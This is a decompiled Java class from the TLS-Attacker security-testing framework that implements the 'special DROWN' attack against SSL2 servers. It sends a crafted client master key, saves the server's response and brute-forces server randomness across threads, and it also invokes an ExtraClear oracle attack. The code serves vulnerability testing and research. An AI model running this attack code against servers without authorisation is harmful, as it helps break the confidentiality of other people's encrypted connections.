/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.impl.drown;

import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
import de.rub.nds.modifiablevariable.util.Modifiable;
import de.rub.nds.tlsattacker.attacks.config.SpecialDrownCommandConfig;
import de.rub.nds.tlsattacker.attacks.constants.DrownVulnerabilityType;
import de.rub.nds.tlsattacker.attacks.impl.drown.BaseDrownAttacker;
import de.rub.nds.tlsattacker.attacks.impl.drown.ExtraClearAttack;
import de.rub.nds.tlsattacker.attacks.impl.drown.LeakyExportBenchmarkRunnable;
import de.rub.nds.tlsattacker.attacks.impl.drown.LeakyExportCheckCallable;
import de.rub.nds.tlsattacker.attacks.impl.drown.LeakyExportCheckData;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.RunningModeType;
import de.rub.nds.tlsattacker.core.constants.SSL2CipherSuite;
import de.rub.nds.tlsattacker.core.exceptions.ConfigurationException;
import de.rub.nds.tlsattacker.core.protocol.message.SSL2ClientMasterKeyMessage;
import de.rub.nds.tlsattacker.core.protocol.message.SSL2ServerVerifyMessage;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.state.TlsContext;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.action.ReceiveAction;
import de.rub.nds.tlsattacker.core.workflow.action.SendAction;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
import de.rub.nds.tlsattacker.util.ConsoleLogger;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import org.apache.commons.lang3.time.DurationFormatUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class SpecialDrownAttacker
extends BaseDrownAttacker {
    private static final Logger LOGGER = LogManager.getLogger();

    public SpecialDrownAttacker(SpecialDrownCommandConfig config, Config baseConfig) {
        super(config, baseConfig);
    }

    @Override
    public void executeAttack() {
        SpecialDrownCommandConfig specialConfig = (SpecialDrownCommandConfig)this.config;
        if (specialConfig.isLeakyExportOracleEnabled()) {
            throw new UnsupportedOperationException("Not implemented yet");
        }
        if (specialConfig.isExtraClearOracleEnabled()) {
            ExtraClearAttack attack = new ExtraClearAttack(this.getTlsConfig());
            attack.execute(this.premasterSecrets, specialConfig);
        }
    }

    @Override
    public DrownVulnerabilityType getDrownVulnerabilityType() {
        SpecialDrownCommandConfig specialConfig = (SpecialDrownCommandConfig)this.config;
        DrownVulnerabilityType vulnerabilityType = DrownVulnerabilityType.UNKNOWN;
        if (specialConfig.isExtraClearOracleEnabled()) {
            ExtraClearAttack attack = new ExtraClearAttack(this.getTlsConfig());
            return attack.checkForExtraClearOracle();
        }
        if (specialConfig.isLeakyExportOracleEnabled()) {
            String dataFilePath = specialConfig.getCheckDataFilePath();
            if (dataFilePath == null) {
                throw new ConfigurationException("Check data file is required");
            }
            if (!specialConfig.isGenCheckData() && !specialConfig.isAnalyzeCheckData()) {
                throw new ConfigurationException("Specify whether to generate or analyze check data");
            }
            if (specialConfig.isGenCheckData()) {
                vulnerabilityType = this.genLeakyExportCheckData(dataFilePath);
            }
            if (specialConfig.isAnalyzeCheckData()) {
                vulnerabilityType = this.checkForLeakyExport(dataFilePath);
            }
        }
        return vulnerabilityType;
    }

    private DrownVulnerabilityType genLeakyExportCheckData(String dataFilePath) {
        Config tlsConfig = this.getTlsConfig();
        SSL2CipherSuite cipherSuite = tlsConfig.getDefaultSSL2CipherSuite();
        int secretKeyLength = cipherSuite.getSecretKeyByteNumber() + 2;
        byte[] secretKey = new byte[secretKeyLength];
        for (int i = 0; i < secretKeyLength; ++i) {
            secretKey[i] = -1;
        }
        ModifiableByteArray secretKeyData = Modifiable.explicit((byte[])secretKey);
        SSL2ClientMasterKeyMessage clientMasterKeyMessage = new SSL2ClientMasterKeyMessage();
        clientMasterKeyMessage.prepareComputations();
        clientMasterKeyMessage.getComputations().setPremasterSecret(secretKeyData);
        WorkflowTrace trace = new WorkflowConfigurationFactory(tlsConfig).createWorkflowTrace(WorkflowTraceType.SSL2_HELLO, RunningModeType.CLIENT);
        trace.addTlsAction(new SendAction(clientMasterKeyMessage));
        trace.addTlsAction(new ReceiveAction(new SSL2ServerVerifyMessage()));
        State state = new State(tlsConfig, trace);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(tlsConfig.getWorkflowExecutorType(), state);
        workflowExecutor.executeWorkflow();
        if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.SSL2_SERVER_HELLO, trace)) {
            return DrownVulnerabilityType.NONE;
        }
        SSL2ServerVerifyMessage serverVerifyMessage = (SSL2ServerVerifyMessage)WorkflowTraceUtil.getFirstReceivedMessage(HandshakeMessageType.SSL2_SERVER_VERIFY, trace);
        ConsoleLogger.CONSOLE.info("Completed server connection");
        LeakyExportCheckData checkData = new LeakyExportCheckData(state.getTlsContext(), clientMasterKeyMessage, serverVerifyMessage);
        try {
            FileOutputStream fileStream = new FileOutputStream(dataFilePath);
            ObjectOutputStream objectStream = new ObjectOutputStream(fileStream);
            objectStream.writeObject(checkData);
            objectStream.close();
            fileStream.close();
        }
        catch (IOException e) {
            throw new RuntimeException(e);
        }
        ConsoleLogger.CONSOLE.info("Wrote check data to " + dataFilePath + ", now call analysis");
        return DrownVulnerabilityType.UNKNOWN;
    }

    private DrownVulnerabilityType checkForLeakyExport(String dataFilePath) {
        int processedSecondBytes;
        LeakyExportCheckData checkData;
        try {
            FileInputStream fileStream = new FileInputStream(dataFilePath);
            ObjectInputStream objectStream = new ObjectInputStream(fileStream);
            checkData = (LeakyExportCheckData)objectStream.readObject();
            objectStream.close();
            fileStream.close();
        }
        catch (IOException | ClassNotFoundException e) {
            throw new RuntimeException(e);
        }
        ConsoleLogger.CONSOLE.info("Check data read from " + dataFilePath + ", now trying to brute-force server randomness");
        int threadNumber = Runtime.getRuntime().availableProcessors();
        ConsoleLogger.CONSOLE.info("Using " + threadNumber + " threads");
        ExecutorService executor = Executors.newFixedThreadPool(threadNumber);
        int firstBytesPerThread = 256 / threadNumber;
        ArrayList<LeakyExportCheckCallable> allCallables = new ArrayList<LeakyExportCheckCallable>();
        ArrayList<Future<Boolean>> allResults = new ArrayList<Future<Boolean>>();
        for (int i = 0; i < threadNumber; ++i) {
            int firstByteFrom = -128 + i * firstBytesPerThread;
            int firstByteTo = i == threadNumber - 1 ? 128 : firstByteFrom + firstBytesPerThread;
            LeakyExportCheckCallable callable = new LeakyExportCheckCallable(firstByteFrom, firstByteTo, checkData);
            allCallables.add(callable);
            allResults.add(executor.submit(callable));
        }
        executor.shutdown();
        DrownVulnerabilityType vulnerabilityType = DrownVulnerabilityType.SSL2;
        block8: do {
            processedSecondBytes = 0;
            for (LeakyExportCheckCallable callable : allCallables) {
                processedSecondBytes += callable.getProcessedSecondBytes();
            }
            double processedPortion = (double)processedSecondBytes / 65536.0;
            String processedPercentage = String.format("%.1f", processedPortion * 100.0);
            ConsoleLogger.CONSOLE.info("Brute-forced approx. {} % so far", (Object)processedPercentage);
            for (Future future : allResults) {
                if (!future.isDone()) continue;
                ConsoleLogger.CONSOLE.info("A thread has finished");
                try {
                    if (!((Boolean)future.get()).booleanValue()) continue;
                    LOGGER.info("Found server randomness, declaring host vulnerable");
                    vulnerabilityType = DrownVulnerabilityType.SPECIAL;
                    break block8;
                }
                catch (InterruptedException e) {
                    e.printStackTrace();
                }
                catch (ExecutionException e) {
                    throw new RuntimeException(e);
                }
            }
            try {
                Thread.sleep(60000L);
            }
            catch (InterruptedException e) {
                e.printStackTrace();
            }
        } while (processedSecondBytes < 65536);
        executor.shutdownNow();
        return vulnerabilityType;
    }

    private void leakyExportBenchmark() {
        long startTime = System.currentTimeMillis();
        Config tlsConfig = this.getTlsConfig();
        SSL2CipherSuite cipherSuite = tlsConfig.getDefaultSSL2CipherSuite();
        State state = new State(tlsConfig);
        TlsContext context = state.getTlsContext();
        byte[] encrypted = new byte[40];
        context.getRandom().nextBytes(encrypted);
        byte[] iv = new byte[cipherSuite.getBlockSize()];
        byte[] challenge = new byte[16];
        context.getRandom().nextBytes(challenge);
        byte[] sessionId = context.getChooser().getServerSessionId();
        byte[] baseMasterKey = new byte[cipherSuite.getClearKeyByteNumber() + cipherSuite.getSecretKeyByteNumber()];
        context.getRandom().nextBytes(baseMasterKey);
        int threadNumber = Runtime.getRuntime().availableProcessors();
        ConsoleLogger.CONSOLE.info("Using " + threadNumber + " threads");
        ExecutorService executor = Executors.newFixedThreadPool(threadNumber);
        int firstBytesPerThread = 256 / threadNumber;
        for (int i = 0; i < threadNumber; ++i) {
            int firstByteFrom = -128 + i * firstBytesPerThread;
            int firstByteTo = i == threadNumber - 1 ? 128 : firstByteFrom + firstBytesPerThread;
            LeakyExportBenchmarkRunnable runnable = new LeakyExportBenchmarkRunnable(cipherSuite, firstByteFrom, firstByteTo);
            runnable.init(encrypted, baseMasterKey, challenge, sessionId, iv);
            executor.execute(runnable);
        }
        executor.shutdown();
        try {
            if (!executor.awaitTermination(60L, TimeUnit.MINUTES)) {
                executor.shutdownNow();
            }
        }
        catch (InterruptedException e) {
            executor.shutdownNow();
            e.printStackTrace();
        }
        long durationMilis = System.currentTimeMillis() - startTime;
        int durationSecs = (int)durationMilis / 1000;
        ConsoleLogger.CONSOLE.info("Time for brute-forcing 3 bytes: " + durationSecs + " seconds");
        long completeMills = durationMilis * 256L * 256L;
        String completeStr = DurationFormatUtils.formatDuration((long)completeMills, (String)"d 'days', H 'hours', m 'minutes'");
        ConsoleLogger.CONSOLE.info("Estimated time to completely brute-force 5 bytes: " + completeStr);
        long expectedMillis = completeMills / 2L;
        String excpectecStr = DurationFormatUtils.formatDuration((long)expectedMillis, (String)"d 'days', H 'hours', m 'minutes'");
        ConsoleLogger.CONSOLE.info("Estimated average time spent brute-forcing 5 bytes: " + excpectecStr);
    }
}

